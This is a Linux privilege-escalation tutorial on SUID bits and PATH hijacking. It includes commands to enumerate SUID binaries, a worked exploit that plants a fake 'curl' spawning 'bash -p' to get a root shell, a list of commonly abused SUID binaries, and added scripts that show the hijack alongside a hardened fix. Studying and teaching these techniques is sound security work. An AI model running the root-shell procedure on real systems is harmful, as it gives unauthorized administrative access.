Path Variable Manipulation
What is SUID, SGID, and Sticky bits?
SUID (set-user-ID, octal 4000): the executable runs with the effective UID of the file's owner instead of the caller's, so a root-owned SUID binary runs as root for any user allowed to execute it. Shown as an s in the owner's execute position (-rwsr-xr-x).
SGID (set-group-ID, octal 2000): the executable runs with the effective GID of the file's group; on a directory, new files inherit the directory's group. Shown as an s in the group's execute position.
Sticky bit (octal 1000): on a world-writable directory such as /tmp, only a file's owner, the directory owner, or root may delete or rename files in it. Shown as a t in the others' execute position (drwxrwxrwt).
Linux ignores SUID and SGID on interpreted scripts (files starting with #!), so only compiled binaries are exploitable through these bits.

Search system for types of files with SUID bits
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Verify file has SUID bit
ls -l /usr/file/test
# Example Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/file/test
Example of exploit
We find a root-owned SUID binary that runs curl by its bare name (no absolute path), so curl is resolved through PATH. Create an executable called curl that spawns a shell, prepend its directory to PATH, and run the binary: curl now resolves to our file and the spawned shell runs as root. Two caveats: the target must be a compiled binary, because Linux ignores the SUID bit on interpreted scripts, and the shell must be started with bash -p, because without -p bash drops the effective UID back to the real UID.
# Verify file has SUID bit
ls -l /usr/bin/script
# Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/script
# Create an executable called curl (a shell script with a shebang); -p keeps the effective UID
printf '#!/bin/bash\n/bin/bash -p\n' > /home/user/curl
chmod +x /home/user/curl
# Modify $PATH so /home/user is searched before the system directories
echo $PATH
export PATH=/home/user:$PATH
echo $PATH
# Running exploit
/usr/bin/script
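The procedure above, as an added self-contained example that is not from the original page: a stand-in target program that resolves curl through PATH, an attacker-controlled curl, and the same PATH prepend, beside a hardened variant that resets PATH before resolving anything. All file names (target, attacker/curl) are hypothetical and live in a temporary directory; nothing here is SUID, so the hijacked command runs as the current user, and the payload is an echo rather than bash -p.

```bash
#!/bin/bash
# Added example (not from the original page). Demonstrates PATH hijacking
# of a program that calls `curl` by bare name, plus the hardened pattern.
# Paths below are hypothetical and created fresh in a temp directory.

# Build the attacker's fake curl in directory $1.
make_fake_curl() {
    mkdir -p "$1"
    cat > "$1/curl" <<'EOF'
#!/bin/sh
echo "HIJACKED as $(id -un)"
EOF
    chmod +x "$1/curl"
}

# Read the target program from stdin into a temp dir, run it with the
# attacker directory prepended to PATH (as the exploit does), print its
# output, then clean up.
run_target_with_hijack() {
    local work; work=$(mktemp -d)
    cat > "$work/target"
    chmod +x "$work/target"
    make_fake_curl "$work/attacker"
    local out; out=$(PATH="$work/attacker:$PATH" "$work/target" 2>&1)
    rm -rf "$work"
    printf '%s\n' "$out"
}

# Vulnerable pattern: curl is resolved through whatever PATH the caller
# supplied, so the attacker's copy wins.
run_vulnerable() {
    run_target_with_hijack <<'EOF'
#!/bin/sh
curl http://example.invalid/health
EOF
}

# Hardened pattern: reset PATH to a fixed trusted value (or use an absolute
# path) before resolving any command, so the attacker's dir is never searched.
run_hardened() {
    run_target_with_hijack <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin; export PATH
resolved=$(command -v curl || true)
echo "curl resolves to: ${resolved:-none}"
EOF
}

run_vulnerable   # HIJACKED as <current user>
run_hardened     # curl resolves to: /usr/bin/curl (or "none" if curl is absent)
```

The same resolution rule applies to system("curl ...") or execvp("curl", ...) inside a compiled SUID binary, which is why PATH must be sanitized (or every command given by absolute path) in anything that runs with elevated privileges.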
What are typical SUID files?

Check each SUID binary you find against https://gtfobins.github.io/ for a known privilege-escalation method. LinEnum or LinPEAS can automate this enumeration.
Common SUID binaries used for priv esc:
nmap
vim
find
bash
more
less
nano
cp (not SUID on a default install, but exploitable if an administrator sets it)
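To turn the list above into a quick triage step, here is an added example (not from the original page) that enumerates SUID files under a root directory and flags those whose name is on the list, so they can be looked up on GTFOBins first. The demo_triage function builds a hypothetical directory tree with constructed files to show the output without scanning the real system; for a real host, run triage_suid with no argument.

```bash
#!/bin/bash
# Added example (not from the original page): enumerate SUID files and flag
# the ones whose basename appears on the page's list of abusable binaries.
# INTERESTING is the page's own list; extend it as needed.

INTERESTING="nmap vim find bash more less nano cp"

# Print each SUID file under $1 (default /), appending " [CHECK GTFOBINS]"
# when its basename is on the list. Unreadable directories are skipped.
triage_suid() {
    local root=${1:-/}
    find "$root" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        local base=${f##*/} flag=""
        for name in $INTERESTING; do
            [ "$base" = "$name" ] && flag=" [CHECK GTFOBINS]"
        done
        printf '%s%s\n' "$f" "$flag"
    done
}

# Same for SGID files (octal 2000), which run with the file group's privileges.
triage_sgid() {
    find "${1:-/}" -type f -perm -2000 2>/dev/null
}

# Demo on a constructed tree (hypothetical paths): a SUID nmap (on the list),
# a SUID "harmless" (not on the list) and a non-SUID find (on the list).
demo_triage() {
    local work; work=$(mktemp -d)
    mkdir -p "$work/usr/bin"
    : > "$work/usr/bin/nmap";     chmod 4755 "$work/usr/bin/nmap"
    : > "$work/usr/bin/harmless"; chmod 4755 "$work/usr/bin/harmless"
    : > "$work/usr/bin/find";     chmod 0755 "$work/usr/bin/find"
    local out; out=$(triage_suid "$work")
    rm -rf "$work"
    printf '%s\n' "$out"
}

demo_triage
# .../usr/bin/nmap [CHECK GTFOBINS]
# .../usr/bin/harmless
```

A SUID file that is not on the list is still worth a look: unusual root-owned SUID binaries in /opt or home directories are exactly the custom programs that tend to call other commands by bare name.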